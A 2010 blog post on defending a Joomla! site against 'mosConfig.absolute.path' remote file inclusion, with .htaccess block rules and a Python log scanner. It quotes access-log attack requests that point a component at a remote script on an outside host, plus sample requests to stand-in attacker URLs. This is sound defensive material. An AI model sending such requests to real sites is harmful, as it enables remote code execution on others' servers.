Block mosConfig.absolute.path attack
Published on May 10th, 2010
Recently, I have seen "confirm mosConfig.absolute.path attack" on my site by Joomla!. Then I felt the need to take some measures.
So this post might help those of you who have the same problem.
Edit .htaccess
This post will explain how to block the attack by an easy .htaccess edit.
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
You will find lines like the ones above in the .htaccess file. Add the following lines directly below them.
RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
RewriteCond %{QUERY_STRING} .*mosconfig.* [OR]
RewriteCond %{QUERY_STRING} .*http:.* [OR]
It is very easy.
But take note of the third line.
It means an error is returned whenever the string "http:" appears in the query string of the URL.
Be careful with plug-in parameters and the like, which may legitimately contain it.
You should also check the access log. If you find entries like the following, your site might be under attack.
118.220.174.89 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_content&view=...40:extemtions&directory=1%20%20//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 42653 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:35 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41811 "-" "Mozilla/5.0"
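To check a whole access log for such entries, here is an added example (not part of the original post) that scans Apache combined-format lines for the strings the three RewriteCond lines look for and reports the status code, so you can see whether a request was served or rejected. It matches case-insensitively on the percent-decoded query string, which is broader than the rules themselves; the sample lines, the scan() function and the com_example component are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log format: client IP, request line and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# The strings the three RewriteCond lines look for, matched case-insensitively.
SUSPICIOUS = re.compile(r'mosconfig|http:', re.IGNORECASE)

# Constructed sample lines (documentation IPs and hosts, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository'
    '&Itemid=&mosConfig.absolute.path=http://attacker.invalid/id1.txt?? HTTP/1.1"'
    ' 200 41813 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [28/Apr/2010:02:40:01 +0900] "GET /?option=com_remository'
    '&mosConfig.absolute.path=http://attacker.invalid/id1.txt HTTP/1.1"'
    ' 403 210 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [28/Apr/2010:09:00:00 +0900] "GET /index.php?option='
    'com_content&view=article&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Legitimate plug-in parameter that the "http:" rule would also reject.
    '198.51.100.21 - - [28/Apr/2010:09:05:00 +0900] "GET /index.php?option='
    'com_example&return=http://www.example.com/ HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (hits, per_ip) for requests whose query string trips the rules."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        query = unquote(m["target"].partition("?")[2])  # also catch %-encoded forms
        found = SUSPICIOUS.search(query)
        if found:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "match": found.group(0).lower(), "query": query})
            per_ip[m["ip"]] += 1
    return hits, per_ip

if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE)
    for h in hits:
        # A 200 means the request reached Joomla!; after the .htaccess edit expect an error status.
        print(h["status"], h["ip"], h["match"], h["query"][:70])
    print(per_ip.most_common())
```

Hits whose match is only "http:" are the ones to review by hand before relying on the third rule, since they may be ordinary plug-in parameters.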
